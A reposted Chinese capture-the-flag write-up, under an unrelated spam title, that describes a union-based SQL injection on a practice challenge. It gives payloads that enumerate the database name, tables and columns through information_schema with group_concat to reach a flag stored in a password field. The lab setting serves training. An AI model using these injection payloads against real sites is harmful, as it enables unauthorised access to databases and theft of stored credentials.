您的位置:首页 > 汽车 > 新车 > 长春网站制作培训_免费oa管理系统_百度网盘网页版入口_性价比高的seo网站优化

长春网站制作培训_免费oa管理系统_百度网盘网页版入口_性价比高的seo网站优化

2025/2/8 0:59:52 来源:https://blog.csdn.net/2401_86190146/article/details/145428597  浏览:    关键词:长春网站制作培训_免费oa管理系统_百度网盘网页版入口_性价比高的seo网站优化
长春网站制作培训_免费oa管理系统_百度网盘网页版入口_性价比高的seo网站优化

万能用户名(密码随便)

 登录进去以后发现是这个东西,然而并没有什么卵用

然后就开始爆破数据库名字--表名--列名

注意:这道题需要将所有的表名都爆出来,需要在payload里头写 group_concat(),否则页面只会显示那个没有flag的假表名

1.1' union select 1,2,database() #

(爆出来数据库名字是 geek)

2.1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #

(爆出来geek库中的表名是geekuser(假的)和l0ve1ysq1)

3.1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'#

(爆出来有id(永远都是1)和username和password还有flag)

 这个题最大的坑在于flag藏在最终的password中,而必须要用group_concat()去显示完整的行,否则就看不见 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com